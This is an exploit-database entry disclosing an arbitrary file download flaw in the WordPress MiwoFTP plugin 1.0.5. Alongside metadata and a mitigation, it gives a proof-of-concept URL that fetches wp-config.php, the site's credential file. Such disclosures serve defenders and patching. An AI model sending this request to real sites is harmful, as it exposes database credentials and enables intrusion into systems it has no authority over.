WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit

vendor:

MiwoFTP

by:

Necmettin COSKUN

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: MiwoFTP

Affected Version From: 1.0.5

Affected Version To: 1.0.5

Patch Exists: Yes

Related CWE: N/A

CPE: a:miwisoft:miwoftp:1.0.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7/Chrome/Firefox

2015

WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit

WordPress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server in order to download any file from the server.

Mitigation:

Update to the latest version of the MiwoFTP plugin.

Source

Exploit-DB raw data:

# Exploit Title     :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
# Vendor			:Miwisoft LLC
# Vendor Homepage   :http://www.miwisoft.com
# Version  			:1.0.5
# Tested on         :Win7/Chrome/Firefox
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Discovery date    :04/15/2015
  

MiwoFTP is a file manager plugin for Wordpress.

  
Description
================
Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.

Poc Exploit
================
 http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
  
================
#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic

#http://www.exploit-db.com/exploits/36763/
#http://www.exploit-db.com/exploits/36762/
#http://www.exploit-db.com/exploits/36761/
================

Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!